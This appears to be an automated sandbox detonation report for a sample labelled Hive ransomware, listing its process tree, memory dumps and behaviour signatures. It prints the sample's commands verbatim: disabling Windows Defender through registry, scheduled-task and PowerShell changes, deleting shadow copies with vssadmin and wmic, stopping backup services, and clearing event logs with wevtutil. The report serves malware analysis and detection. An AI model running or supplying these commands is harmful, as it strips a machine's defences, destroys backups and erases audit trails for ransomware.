Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3480 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1292 wrote to memory of 3484 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1292 wrote to memory of 3484 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1292 wrote to memory of 3484 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1248 wrote to memory of 2548 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1248 wrote to memory of 2548 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1248 wrote to memory of 2548 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3700 wrote to memory of 2500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3700 wrote to memory of 2500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3700 wrote to memory of 2500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3652 wrote to memory of 3268 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3652 wrote to memory of 3268 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3652 wrote to memory of 3268 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 2688 wrote to memory of 2112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2688 wrote to memory of 2112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2688 wrote to memory of 2112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 328 wrote to memory of 1788 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 328 wrote to memory of 1788 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 328 wrote to memory of 1788 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 3872 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 3872 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 3872 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3676 wrote to memory of 956 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3676 wrote to memory of 956 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3676 wrote to memory of 956 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 3480 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 60 wrote to memory of 1300 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 60 wrote to memory of 1300 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 60 wrote to memory of 1300 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3480 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe
PID 3480 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe

"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_13561" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_13561" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_13561" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/1292-115-0x0000000000000000-mapping.dmp

memory/3484-116-0x0000000000000000-mapping.dmp

memory/1248-117-0x0000000000000000-mapping.dmp

memory/2548-118-0x0000000000000000-mapping.dmp

memory/3700-119-0x0000000000000000-mapping.dmp

memory/2500-120-0x0000000000000000-mapping.dmp

memory/3652-121-0x0000000000000000-mapping.dmp

memory/3268-122-0x0000000000000000-mapping.dmp

memory/2688-123-0x0000000000000000-mapping.dmp

memory/2112-124-0x0000000000000000-mapping.dmp

memory/328-125-0x0000000000000000-mapping.dmp

memory/1788-126-0x0000000000000000-mapping.dmp

memory/3328-127-0x0000000000000000-mapping.dmp

memory/3872-128-0x0000000000000000-mapping.dmp

memory/3676-129-0x0000000000000000-mapping.dmp

memory/956-130-0x0000000000000000-mapping.dmp

memory/60-131-0x0000000000000000-mapping.dmp

memory/1300-132-0x0000000000000000-mapping.dmp

memory/948-133-0x0000000000000000-mapping.dmp

memory/2380-134-0x0000000000000000-mapping.dmp

memory/2356-135-0x0000000000000000-mapping.dmp

memory/1848-136-0x0000000000000000-mapping.dmp

memory/4048-137-0x0000000000000000-mapping.dmp

memory/1772-138-0x0000000000000000-mapping.dmp

memory/3128-139-0x0000000000000000-mapping.dmp

memory/3004-140-0x0000000000000000-mapping.dmp

memory/1324-141-0x0000000000000000-mapping.dmp

memory/1524-142-0x0000000000000000-mapping.dmp

memory/1384-143-0x0000000000000000-mapping.dmp

memory/2132-144-0x0000000000000000-mapping.dmp

memory/3196-145-0x0000000000000000-mapping.dmp

memory/2676-146-0x0000000000000000-mapping.dmp

memory/1680-147-0x0000000000000000-mapping.dmp

memory/2860-148-0x0000000000000000-mapping.dmp

memory/2884-149-0x0000000000000000-mapping.dmp

memory/2668-150-0x0000000000000000-mapping.dmp

memory/2548-151-0x0000000000000000-mapping.dmp

memory/1548-152-0x0000000000000000-mapping.dmp

memory/2500-153-0x0000000000000000-mapping.dmp

memory/600-154-0x0000000000000000-mapping.dmp

memory/2112-155-0x0000000000000000-mapping.dmp

memory/3040-156-0x0000000000000000-mapping.dmp

memory/2864-157-0x0000000000000000-mapping.dmp

memory/364-158-0x0000000000000000-mapping.dmp

memory/684-159-0x0000000000000000-mapping.dmp

memory/1992-160-0x0000000000000000-mapping.dmp

memory/332-161-0x0000000000000000-mapping.dmp

memory/2556-162-0x0000000000000000-mapping.dmp

memory/3952-163-0x0000000000000000-mapping.dmp

memory/2120-164-0x0000000000000000-mapping.dmp

memory/2224-165-0x0000000000000000-mapping.dmp

memory/3132-166-0x0000000000000000-mapping.dmp

memory/3124-167-0x0000000000000000-mapping.dmp

memory/1520-168-0x0000000000000000-mapping.dmp

memory/2276-169-0x0000000000000000-mapping.dmp

memory/3536-170-0x0000000000000000-mapping.dmp

memory/3204-171-0x0000000000000000-mapping.dmp

memory/4020-172-0x0000000000000000-mapping.dmp

memory/3824-173-0x0000000000000000-mapping.dmp

memory/952-174-0x0000000000000000-mapping.dmp

memory/3512-175-0x0000000000000000-mapping.dmp

memory/3496-176-0x0000000000000000-mapping.dmp

memory/528-177-0x0000000000000000-mapping.dmp

memory/3616-178-0x0000000000000000-mapping.dmp

memory/1764-180-0x00000000008F0000-0x00000000008F1000-memory.dmp

memory/1764-179-0x00000000008F0000-0x00000000008F1000-memory.dmp

memory/1764-181-0x0000000000C30000-0x0000000000C31000-memory.dmp

memory/1764-182-0x0000000004290000-0x00000000042C6000-memory.dmp

memory/1764-183-0x0000000000C32000-0x0000000000C33000-memory.dmp

memory/1764-184-0x0000000006D50000-0x0000000007378000-memory.dmp

memory/1764-185-0x0000000006930000-0x0000000006952000-memory.dmp

memory/1764-186-0x00000000073F0000-0x0000000007456000-memory.dmp

memory/1764-187-0x0000000007560000-0x00000000075C6000-memory.dmp

memory/1764-188-0x0000000007700000-0x0000000007A50000-memory.dmp

memory/1764-189-0x00000000075F0000-0x000000000760C000-memory.dmp

memory/1764-190-0x0000000007610000-0x000000000765B000-memory.dmp

memory/1764-191-0x0000000007D80000-0x0000000007DF6000-memory.dmp

memory/1764-192-0x00000000008F0000-0x00000000008F1000-memory.dmp

memory/1764-200-0x0000000006D50000-0x0000000007378000-memory.dmp

memory/1764-201-0x000000007E950000-0x000000007E951000-memory.dmp

memory/1764-202-0x0000000008BB0000-0x0000000008BE3000-memory.dmp

memory/1764-203-0x0000000008BB0000-0x0000000008BE3000-memory.dmp

memory/1764-204-0x0000000006930000-0x0000000006952000-memory.dmp

memory/1764-205-0x00000000073F0000-0x0000000007456000-memory.dmp

memory/1764-206-0x0000000007560000-0x00000000075C6000-memory.dmp

memory/1764-207-0x0000000007610000-0x000000000765B000-memory.dmp

memory/1764-208-0x0000000007D80000-0x0000000007DF6000-memory.dmp

memory/1764-209-0x0000000008AF0000-0x0000000008B0E000-memory.dmp

memory/1764-214-0x0000000008E10000-0x0000000008EB5000-memory.dmp

memory/1764-215-0x0000000000C33000-0x0000000000C34000-memory.dmp

memory/1764-216-0x0000000009190000-0x0000000009224000-memory.dmp

memory/1764-409-0x0000000009090000-0x00000000090AA000-memory.dmp

memory/1764-414-0x0000000009090000-0x00000000090AA000-memory.dmp

memory/1764-415-0x0000000009080000-0x0000000009088000-memory.dmp

memory/1764-420-0x0000000009080000-0x0000000009088000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

memory/3388-433-0x0000000004140000-0x0000000004176000-memory.dmp

memory/3388-434-0x0000000006D30000-0x0000000007358000-memory.dmp

memory/3388-435-0x00000000066F0000-0x00000000066F1000-memory.dmp

memory/3388-436-0x00000000066F2000-0x00000000066F3000-memory.dmp

memory/3388-437-0x0000000006AE0000-0x0000000006B02000-memory.dmp

memory/3388-439-0x0000000007420000-0x0000000007486000-memory.dmp

memory/3388-438-0x0000000006B80000-0x0000000006BE6000-memory.dmp

memory/3388-440-0x0000000007490000-0x00000000077E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 46213c672e82f1f8c20669652a1606a5
SHA1 b0c123a57ae84b56a8559c4c964066274e2d1ad4
SHA256 7d8e1c5b27262d3330fd6535755326519e523f27946933e7352d9c681a3b3d71
SHA512 c58884ac19a9069d93916bb4fea48579d6ce653822b5ab1fb5ca146747bd4707600886d9febe2a810e3699aca3e8ecf9184f340f6ca6f6461329c551d1ef6b45

memory/3388-442-0x00000000078F0000-0x000000000790C000-memory.dmp

memory/3388-443-0x0000000007C40000-0x0000000007C8B000-memory.dmp

memory/3388-444-0x0000000007CA0000-0x0000000007D16000-memory.dmp

memory/3388-453-0x0000000006D30000-0x0000000007358000-memory.dmp

memory/3388-455-0x0000000008AD0000-0x0000000008B03000-memory.dmp

memory/3388-459-0x0000000007C40000-0x0000000007C8B000-memory.dmp

memory/3388-460-0x0000000007CA0000-0x0000000007D16000-memory.dmp

memory/3388-458-0x0000000007420000-0x0000000007486000-memory.dmp

memory/3388-457-0x0000000006B80000-0x0000000006BE6000-memory.dmp

memory/3388-456-0x0000000006AE0000-0x0000000006B02000-memory.dmp

memory/3388-454-0x0000000008AD0000-0x0000000008B03000-memory.dmp

memory/3388-461-0x0000000008AB0000-0x0000000008ACE000-memory.dmp

memory/3388-466-0x0000000008EC0000-0x0000000008F65000-memory.dmp

memory/3388-467-0x0000000009010000-0x00000000090A4000-memory.dmp

memory/3388-483-0x000000007F850000-0x000000007F851000-memory.dmp

memory/3388-485-0x00000000066F3000-0x00000000066F4000-memory.dmp

memory/3388-667-0x0000000008F90000-0x0000000008FAA000-memory.dmp

memory/3388-662-0x0000000008F90000-0x0000000008FAA000-memory.dmp

memory/3388-668-0x0000000008F80000-0x0000000008F88000-memory.dmp

memory/3388-673-0x0000000008F80000-0x0000000008F88000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 19:26

Reported

2022-01-12 19:31

Platform

win7-en-20211208

Max time kernel

163s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
